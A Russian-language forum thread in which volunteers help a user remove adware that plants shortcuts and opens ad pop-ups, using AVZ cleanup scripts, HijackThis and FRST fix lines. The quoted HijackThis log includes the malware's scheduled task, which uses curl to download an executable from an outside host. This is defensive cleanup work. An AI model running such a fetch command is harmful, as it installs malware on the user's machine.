Доброго дня!
Прошу помощи в удаление из системы вируса: произвольно устанавливаются ярлыки на рабочем столе Войны престолов, при переходе в браузере по ссылкам открываются рекламные окна.
Лог во вложении

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (http://safezone.cc/forum/showthread.php?t=18577).

Выполните скрипт в АВЗ (http://forum.oszone.net/post-1430637-4.html) (Файл - Выполнить скрипт):


begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl.exe','');
QuarantineFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl_7_54.exe','');
QuarantineFile('C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe','');
QuarantineFile('C:\WINDOWS\system32\drivers\mevrgooh.sys','');
DeleteFile('C:\WINDOWS\system32\Tasks\curl','64');
DeleteFile('C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl_7_54.exe','32');
DeleteFile('C:\WINDOWS\system32\Tasks\curls','64');
DeleteFile('C:\WINDOWS\system32\Tasks\MSI','64');
DeleteFile('C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe','32');
DeleteFile('C:\WINDOWS\system32\drivers\mevrgooh.sys','32');
DeleteFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl_7_54.exe','32');
DeleteFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl.exe','32');
DeleteService('mevrgooh');
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.


Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы (http://www.oszone.net/virusnet/) или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (http://forum.oszone.net/post-1430293-2.html) (некоторые строки могут отсутствовать):

R0 - HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = https://newtab.club
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): MSI - C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Desktop\tn_tfile_me_torrent___.exe" (file missing)
O22 - Task (Ready): curl - C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl.exe"
O22 - Task (Ready): curls - C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl.exe
O22 - Task (Ready): lidnkghmpmbmkjalooojbaefceoolghb - C:\Users\Алина Ткаченко\AppData\Roaming\lidnkghmpmbmkjalooojbaefceoolghb\python\pythonw.exe "C:\Users\Алина Ткаченко\AppData\Roaming\lidnkghmpmbmkjalooojbaefceoolghb\ml.py" --APPNAME="lidnkghmpmbmkjalooojbaefceoolghb" (file missing)


- Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK (https://safezone.cc/resources/102/). Отчёт о работе прикрепите.

Скачайте Farbar Recovery Scan Tool (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве ('https://safezone.cc/threads/17759/').

Доброго дня!
Спасибо за помощь.
Отчеты о проделанной работе во вложении

Shortcut.txt превышает размер. Загрузить не удалось

Упакуйте архиватором.

во вложении

апд. при переходе по ссылкам продолжаем грузится окно с рекламой

Отключите до перезагрузки антивирус.
Выделите следующий код:
Start::
CreateRestorePoint:
GroupPolicy: Restriction - Chrome <==== ATTENTION
Task: {59FB298D-B52F-48A8-A530-F97CBD25543E} - System32\Tasks\ComDev => C:\Users\Алина Ткаченко\AppData\Local\ComDev\ComDev.exe <==== ATTENTION
Task: {CE1D72C9-977C-4B85-A1C1-A5E69840AFBB} - \curl -> No File <==== ATTENTION
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве ('http://safezone.cc/threads/17760/').


при переходе по ссылкам »
В каком браузере?

Fixlog.txt во вложении
браузер Google Chrome

Если проблема сохраняется:
Отключите в Хроме все расширения, в т.ч. стандартные. Пропадет - включайте по одному, пока не найдете виновника. Название сообщите.

Отключение расширений помогло. Но к сожалению выяснить кто виновник не удалось. Очень много плагинов. Удалила все. Полет нормальный.
Спасибо всем за оперативную помощь!

В завершение:

Загрузите SecurityCheck by glax24 & Severnyj (http://tools.safezone.cc/glax24/SecurityCheck/SecurityCheck.exe) и сохраните утилиту на Рабочем столе
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
Прикрепите этот файл к своему следующему сообщению.

во вложении

--------------------------- [ OtherUtilities ] ----------------------------
WinRAR 5.40 (64-bit) v.5.40.0 Внимание! Скачать обновления (http://www.rarlab.com/download.htm)
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.0.43916 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
--------------------------- [ AppleProduction ] ---------------------------
iTunes v.12.6.0.100 Внимание! Скачать обновления (https://www.apple.com/ru/itunes/download/)
^Для проверки новой версии используйте приложение Apple Software Update^
------------------------------- [ Browser ] -------------------------------
Google Chrome v.61.0.3163.79 Внимание! Скачать обновления (https://www.google.ru/chrome/browser/desktop/index.html)
^Проверьте обновления через меню Справка - О Google Chrome!^


Рекомендации после лечения. (http://forum.oszone.net/post-1838507-9.html)

Благодарю!